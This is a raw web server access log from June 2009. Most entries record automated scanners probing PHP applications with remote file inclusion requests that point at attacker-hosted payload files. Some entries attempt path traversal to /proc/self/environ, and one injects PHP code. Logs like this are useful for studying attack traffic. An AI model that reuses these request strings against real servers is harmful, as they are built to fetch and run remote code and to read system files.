201.232.54.48 - - [26/Jun/2009:07:41:44 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3248 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:07:41:45 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 3248 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:07:41:50 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 194793 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:07:41:50 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 194793 "-""libwww-perl/5.805"
89.223.3.98 - - [26/Jun/2009:07:41:51 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.223.3.98 - - [26/Jun/2009:07:41:55 -0500] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://wijaya.kilu.de/Fx29ID.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:07:45:37 -0500] "GET /logs/canal.php?meio=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:07:45:37 -0500] "GET /canal.php?meio=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:07:45:37 -0500] "GET /logs/access_log.1240444800/canal.php?meio=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:07:46:11 -0500] "GET /logs/access_log.1241654400//html/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.17.99.13 - - [26/Jun/2009:07:46:19 -0500] "GET /logs/access_log.1241740800//html/htmltonuke.php?filnavn=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:07:47:08 -0500] "GET /logs/access_log.1235433600/bbshop/shop/index.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
83.16.182.130 - - [26/Jun/2009:07:47:35 -0500] "GET /logs/access_log.1236729600/bbshop/shop/index.php?page=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
62.140.23.185 - - [26/Jun/2009:07:59:11 -0500] "GET //?sIncPath=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:07:59:12 -0500] "GET /logs//?sIncPath=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 200 194790 "-""libwww-perl/5.803"
213.189.2.38 - - [26/Jun/2009:07:59:45 -0500] "GET //modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:08:00:24 -0500] "GET /logs/access_log.1236470400//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:08:00:24 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.189.2.38 - - [26/Jun/2009:08:00:51 -0500] "GET /logs/access_log.1235952000//modules/xfsection/modify.php?dir_module=http://rsh.kiev.ua/images/idfx1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:08:01:13 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:08:01:13 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:08:01:13 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://www.ital.k12.tr/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.106.158 - - [26/Jun/2009:08:09:24 -0500] "GET /logs/access_log.1201564800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
69.65.41.165 - - [26/Jun/2009:08:11:01 -0500] "GET /logs/access_log.1235952000/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.65.41.165 - - [26/Jun/2009:08:11:01 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.65.41.165 - - [26/Jun/2009:08:11:01 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.65.41.165 - - [26/Jun/2009:08:11:01 -0500] "GET /logs/access_log.1236211200/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
83.172.140.17 - - [26/Jun/2009:08:11:01 -0500] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
83.172.140.17 - - [26/Jun/2009:08:11:02 -0500] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
69.65.41.165 - - [26/Jun/2009:08:11:09 -0500] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.65.41.165 - - [26/Jun/2009:08:11:09 -0500] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.65.41.165 - - [26/Jun/2009:08:11:09 -0500] "GET /logs/access_log.1236211200/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
69.65.41.165 - - [26/Jun/2009:08:11:09 -0500] "GET /logs/access_log.1235952000/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://kineticwealth.com///blog/wp-content/plugins/google-ads/lolid1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
83.172.140.17 - - [26/Jun/2009:08:12:06 -0500] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
83.172.140.17 - - [26/Jun/2009:08:12:06 -0500] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 337 "-""libwww-perl/5.79"
82.194.87.219 - - [26/Jun/2009:08:13:23 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 340 "-""libwww-perl/5.822"
75.125.198.130 - - [26/Jun/2009:08:14:35 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:08:14:35 -0500] "GET //include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
62.140.23.185 - - [26/Jun/2009:08:15:11 -0500] "GET /errors.php?error=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.137.51 - - [26/Jun/2009:08:16:36 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
91.121.137.51 - - [26/Jun/2009:08:16:36 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
75.125.198.130 - - [26/Jun/2009:08:19:27 -0500] "GET //include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:08:19:27 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://kuettner.it/yes.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
65.55.208.122 - - [26/Jun/2009:08:20:01 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.122 - - [26/Jun/2009:08:20:02 -0500] "GET /logs/ HTTP/1.1" 200 194785 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.108.67.131 - - [26/Jun/2009:08:24:31 -0500] "GET /logs/index.php?cct_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.812"
89.108.67.131 - - [26/Jun/2009:08:24:32 -0500] "GET /index.php?cct_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.812"
89.108.67.131 - - [26/Jun/2009:08:25:21 -0500] "GET /logs/index.php?cct_base=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
89.108.67.131 - - [26/Jun/2009:08:25:21 -0500] "GET /index.php?cct_base=http://www.kure-lionsclub.com//templates_c/cmdstate.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
89.108.67.131 - - [26/Jun/2009:08:30:49 -0500] "GET /logs/access_log.1231113600/index.php?cct_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 319 "-""libwww-perl/5.812"
89.108.67.131 - - [26/Jun/2009:08:30:49 -0500] "GET /index.php?cct_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-""libwww-perl/5.812"
89.108.67.131 - - [26/Jun/2009:08:30:50 -0500] "GET /logs/index.php?cct_base=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.812"
75.125.198.130 - - [26/Jun/2009:08:34:00 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kuettner.it/yes.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:08:34:00 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://kuettner.it/yes.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
83.172.140.17 - - [26/Jun/2009:08:34:06 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
83.172.140.17 - - [26/Jun/2009:08:34:06 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
83.172.140.17 - - [26/Jun/2009:08:34:08 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
83.172.140.17 - - [26/Jun/2009:08:34:09 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://muhmim.trakya.edu.tr/baharkonferanslari/id1.txt??%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
82.194.87.219 - - [26/Jun/2009:08:40:37 -0500] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 341 "-""libwww-perl/5.822"
74.52.187.58 - - [26/Jun/2009:08:41:48 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:08:41:48 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:08:41:48 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:08:41:51 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:08:41:51 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:08:41:51 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:08:41:53 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:08:41:55 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:42:15 -0500] "GET /errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:42:15 -0500] "GET /logs/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:42:15 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:43:12 -0500] "GET /logs/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:43:12 -0500] "GET /errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:43:13 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:43:16 -0500] "GET /errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:43:16 -0500] "GET /logs/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:43:17 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:08:43:58 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:08:43:58 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:08:43:58 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:08:44:04 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:44:05 -0500] "GET /errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:44:05 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.154.69 - - [26/Jun/2009:08:44:05 -0500] "GET /logs/errors.php?error=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.125.5.1 - - [26/Jun/2009:08:44:59 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
59.125.5.1 - - [26/Jun/2009:08:44:59 -0500] "GET /?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
59.125.5.1 - - [26/Jun/2009:08:45:06 -0500] "GET /logs/?sourcedir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 200 194785 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:08:46:52 -0500] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 341 "-""libwww-perl/5.822"
201.232.54.48 - - [26/Jun/2009:08:50:45 -0500] "GET //ashnews.php?pathtoashnews=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:08:50:47 -0500] "GET /logs//ashnews.php?pathtoashnews=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
201.232.54.48 - - [26/Jun/2009:08:51:56 -0500] "GET /logs//ashnews.php?pathtoashnews=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
65.55.208.134 - - [26/Jun/2009:08:52:31 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [26/Jun/2009:08:52:31 -0500] "GET /logs/access_log.1170115200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [26/Jun/2009:08:52:31 -0500] "GET /logs/access_log.1207612800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
204.62.54.203 - - [26/Jun/2009:08:53:18 -0500] "GET / HTTP/1.1" 200 3245 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
75.125.198.130 - - [26/Jun/2009:08:53:53 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kuettner.it/yes.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.811"
75.125.198.130 - - [26/Jun/2009:08:53:53 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kuettner.it/yes.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.811"
209.200.37.14 - - [26/Jun/2009:08:54:52 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
209.200.37.14 - - [26/Jun/2009:08:54:52 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.702com.net/images/702b/yes.txt???? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
66.249.68.42 - - [26/Jun/2009:08:58:03 -0500] "GET /icons/text.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
74.52.187.58 - - [26/Jun/2009:09:04:02 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:04:02 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:04:02 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:04:02 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:04:26 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:04:26 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:04:26 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
74.52.187.58 - - [26/Jun/2009:09:04:26 -0500] "GET /logs/access_log.1239494400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://wijaya.kilu.de/Fx29ID.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
83.98.209.71 - - [26/Jun/2009:09:05:49 -0500] "GET //include/bbs.lib.inc.php?site_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
83.98.209.71 - - [26/Jun/2009:09:05:49 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://info.glandeves.fr//xoops_lib/modules/protector/id.txt%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
220.181.7.97 - - [26/Jun/2009:09:06:30 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.194.87.219 - - [26/Jun/2009:09:07:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 340 "-""libwww-perl/5.822"
91.142.209.134 - - [26/Jun/2009:09:07:58 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:07:58 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:07:59 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:07:59 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
217.65.6.12 - - [26/Jun/2009:09:09:35 -0500] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
217.65.6.12 - - [26/Jun/2009:09:09:35 -0500] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
217.65.6.12 - - [26/Jun/2009:09:09:35 -0500] "GET /logs/access_log.1237766400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
217.65.6.12 - - [26/Jun/2009:09:09:35 -0500] "GET /logs/access_log.1235606400/mygallery/myfunctions/mygallerybrowser.php?myPath=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
82.194.87.219 - - [26/Jun/2009:09:09:43 -0500] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.laubrotel.com/letter/id? HTTP/1.1" 404 341 "-""libwww-perl/5.822"
87.229.45.106 - - [26/Jun/2009:09:10:16 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:09:10:16 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:09:10:20 -0500] "GET /logs/access_log.1236211200//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
87.229.45.106 - - [26/Jun/2009:09:10:20 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.d-sport.ru//assets/cache/fx29id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
91.142.209.134 - - [26/Jun/2009:09:12:03 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:12:03 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:12:24 -0500] "GET /logs//include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
91.142.209.134 - - [26/Jun/2009:09:12:24 -0500] "GET //include/write.php?dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
222.236.47.188 - - [26/Jun/2009:09:13:47 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
